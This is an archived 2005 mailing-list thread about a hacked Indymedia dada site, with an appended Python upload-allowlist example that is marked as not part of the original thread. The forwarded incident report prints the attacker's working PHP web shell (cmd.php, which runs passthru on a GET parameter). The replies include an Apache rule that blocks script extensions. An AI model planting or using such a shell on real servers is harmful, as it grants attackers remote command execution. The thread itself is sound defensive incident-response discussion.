[Imc-tech] [Fwd: dada hacked]
Zachary C. Miller
zach at chambana.net
Thu Apr 28 12:40:28 CDT 2005
Arun's got it right. This is an OLD dada vulnerability that we patched
a long time ago.
<DirectoryMatch ^/var/www/.*/usermedia>
    Options None
    AllowOverride None
    # Refuse to serve any file whose extension starts with "ph" (php, phtml,
    # php3, php.jpg ...) or is cgi, pl or asf, case-insensitively. The dot is
    # escaped so it matches a literal "." rather than any character.
    <FilesMatch "\.([Pp][Hh].*|[Cc][Gg][Ii]|[Pp][Ll]|[Aa][Ss][Ff])$">
        Order deny,allow
        Deny from all
    </FilesMatch>
</DirectoryMatch>
It would be nice if dada were patched to disallow these filetypes as
well. We shouldn't disable "non-image uploads" since sound files and
some video uploads are also legitimate. But we should severely
restrict the types of multimedia that folks can upload.
Arun Bhalla wrote:
> I think it might be okay as is. Zach has Apache set up to not serve
> php or cgi requests from the usermedia/application directory. That's why
> you get a Forbidden HTTP result if you try to click on that. Someone
> else uploaded "icon.php" around March 8th and apparently gave up around
> then.
>
> But if (non-image) uploads have no utility for our users, let's shut it off.
>
> Arun
>
> "Daniel S. Lewart" writes:
> > Mike, Zach, et al,
> >
> > If someone knows how to disable uploads, that would be a good thing.
> >
> > Cheers,
> > Dan
> >
> > -------- Original Message --------
> > Subject: dada hacked
> > Date: Thu, 28 Apr 2005 12:04:04 -0300 (BRT)
> > From: pietro <pietro at indymedia.org>
> > Reply-To: dadaIMC Discussion <dadaIMC at lists.nothingness.org>
> > To: dadaIMC at lists.nothingness.org
> >
> > hey folks,
> >
> > nj imc was one of the hacked dada sites. it was running .98. looking at
> > the logs it seems that the attacker uploaded a .php file and used it to
> > execute commands on the server.
> >
> > the file was called cmd.php and its contents are:
> >
> > <?php
> > $cmd = $_GET['cmd'];
> > passthru("$cmd", $return);
> > ?>
> >
> >
> > pietro.
> >
> >
> > -------------
> > To unsubscribe, send blank email
> > to dadaIMC-off at lists.dadaimc.org
> >
> > _______________________________________________
> > Imc-tech mailing list
> > Imc-tech at lists.ucimc.org
> > http://lists.chambana.net/cgi-bin/listinfo/imc-tech
> >
--
Zachary C. Miller - @= - http://zach.chambana.net/
IMSA 1995 - UIUC 2000 - Just Another Leftist Muppet - Ya Basta!
Social Justice, Community, Nonviolence, Decentralization, Feminism,
Sustainability, Responsibility, Diversity, Democracy, Ecology
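As an added example that is not part of the original thread: the upload-side media allowlist Zach asks for, beside a Python re-check of his Apache FilesMatch rule (dot escaped to match a literal period), run over constructed sample uploads including the cmd.php name from pietro's report. The accepted media types, their magic bytes and the sample contents are assumptions made here, not values from the list.

```python
import re

# Extensions the upload handler will accept, each with the magic bytes a genuine
# file of that type starts with. Constructed set; the thread names no list.
ALLOWED_MEDIA = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
    "ogg": (b"OggS",),
}

# Zach's FilesMatch pattern with the dot escaped: any extension starting with
# "ph" (php, phtml, php3, even php.jpg), or cgi, pl, asf, case-insensitively.
APACHE_DENY_RE = re.compile(r"\.([Pp][Hh].*|[Cc][Gg][Ii]|[Pp][Ll]|[Aa][Ss][Ff])$")


def apache_denies(filename):
    """True if the usermedia FilesMatch rule would refuse to serve this name."""
    return APACHE_DENY_RE.search(filename.rsplit("/", 1)[-1]) is not None


def upload_allowed(filename, head):
    """Allowlist check for the upload handler: exactly one extension, that
    extension must be a known media type, and the first bytes of the content
    (`head`) must match it. Returns (ok, reason)."""
    name = filename.rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "expected basename.ext with a single extension"
    ext = parts[1]
    if ext not in ALLOWED_MEDIA:
        return False, f".{ext} is not an allowed media type"
    if not head.startswith(ALLOWED_MEDIA[ext]):
        return False, f"content does not start like a .{ext} file"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample uploads: the shell name from the report plus media files.
    samples = [
        ("cmd.php", b"<?php\n$cmd = $_GET['cmd'];"),
        ("clip.php.jpg", b"\xff\xd8\xff\xe0"),
        ("notes.jpg", b"just some text, not an image"),
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
        ("graph.png", b"\x89PNG\r\n\x1a\n"),
    ]
    for fname, head in samples:
        print(f"{fname:14} apache_denies={apache_denies(fname)!s:5} "
              f"upload_allowed={upload_allowed(fname, head)}")
```

Run as a script it prints one line per sample; the escaped dot is why graph.png is served while clip.php.jpg is still refused, which the unescaped original would have got wrong for the former.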